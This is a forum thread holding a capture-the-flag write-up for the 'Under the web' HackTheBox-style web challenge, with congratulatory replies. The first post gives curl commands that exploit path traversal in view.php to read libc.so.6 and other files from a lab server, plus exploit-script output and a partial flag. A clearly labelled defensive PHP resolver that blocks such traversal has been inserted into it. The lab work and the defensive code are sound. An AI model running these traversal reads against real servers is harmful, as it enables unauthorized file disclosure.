Under the web (MEDIUM) WriteUp
by Phoka - Tuesday February 25, 2025 at 04:29 AM
#1
First save the libc.so.6 file from the web (LFI) to your current dir

curl -s 'http://94.237.54.42:49922/view.php?image=/../../../../usr/lib/x86_64-linux-gnu/libc.so.6' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d > ./libc.so.6

___________________________________________________________________________________________________________________
.
├── Dockerfile
├── flag.txt
├── index.php
├── libc.so.6
├── metadata_reader.so
├── start.sh
├── upload.php
├── uploads
│   ├── starry_night.png
│   └── the_potato_eaters.png
└── view.php
________________________________________________________________________________________________________

we will need to Upload a picture to the web (Png)

we will use a script for that 

copy any normal PNG to your current dir 
name it Picture.png
before running the script


after running the script 

python exploit.py IP : Port
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] Opening connection to 94.2.5.6 on port 585: Done
[+] Receiving all data: Done (41.78KB)
[*]Closed connection to 94.2.4.6 port 585
[+] Found metadata_reader.so base: 7f7161a29000 (0x7f7161a29000)
Resetting Picture.png first...
STDOUT:      1 image files updated
STDOUT:      1 image files updated
STDOUT:      1 image files updated
STDOUT:      1 image files updated
STDOUT: 
File uploaded successfully
<script>alert('File uploaded successfully as Picture.png');</script>
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
run curl -s 'http://94.2.5.6:585/view.php?image=/app/test.png' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
then you will see the path of the exploit path, then the final command is
curl -s 'http://94.2.5.6:585/view.php?image=/app/$$$the path of the exploit path$$$' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
HTB{H4ck!ng_w3b_fr0m....}
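A defensive counterpart to the `view.php?image=` reads in the post above, as an added example that is not part of the original post or the challenge's code: a resolver that confines the `image` parameter to the uploads directory and refuses to serve anything that is not a PNG. The base directory `/app/uploads`, the helper name `resolve_image` and PHP 8 are assumptions; the demo files are constructed.

```php
<?php
// Added example, not the challenge's code. Requires PHP 8 (str_starts_with).
// UPLOAD_DIR is an assumption drawn from the /app path and uploads/ folder above.
const UPLOAD_DIR = '/app/uploads';
const PNG_MAGIC  = "\x89PNG\r\n\x1a\n";

// Hypothetical helper: map a user-supplied name to a PNG inside $baseDir, or null.
function resolve_image(string $requested, string $baseDir = UPLOAD_DIR): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Keep only the last path component, so traversal sequences and absolute
    // paths collapse to a bare file name that is looked up under $base.
    $name = basename(str_replace('\\', '/', $requested));
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // realpath() resolves symlinks; the final target must still sit under $base.
    $path = realpath($base . '/' . $name);
    if ($path === false || !str_starts_with($path, $base . '/') || !is_file($path)) {
        return null;
    }
    // Content check: never label arbitrary bytes (a shared object, a text file) as PNG.
    $head = file_get_contents($path, false, null, 0, strlen(PNG_MAGIC));
    return $head === PNG_MAGIC ? $path : null;
}

// Constructed demo in a temp directory; none of these files come from the page.
$root = sys_get_temp_dir() . '/view_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/uploads/ok.png', PNG_MAGIC . 'constructed');
file_put_contents($root . '/uploads/notes.txt', 'constructed, not a PNG');
file_put_contents($root . '/secret.txt', 'constructed');
symlink($root . '/secret.txt', $root . '/uploads/link.png');

$cases = ['ok.png', '/../../../../usr/lib/x86_64-linux-gnu/libc.so.6',
          $root . '/secret.txt', 'notes.txt', 'link.png'];
foreach ($cases as $c) {
    $hit = resolve_image($c, $root . '/uploads');
    printf("%-50s %s\n", $c, $hit === null ? 'rejected' : 'served');
}
```

In a handler, a null result would be answered with a 404 before any file bytes are base64-encoded into the response.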
#2
LOL nice phoka! I did it nicely in 1st 50th position
#3
(Feb 25, 2025, 08:22 AM) cavour13 Wrote: LOL nice phoka! I did it nicely in 1st 50th position

Cool bros <3 that really is nice man 
keep up the great work
#4
Good write-up! I really learned something from this. Thanks!
#5
(Mar 14, 2025, 02:28 PM) hellme Wrote: Good write-up! I really learned something from this. Thanks!

Cool boss

you must be really good at coding Python
because this code became a write-up to you, that means you went through the functions of the code

right??

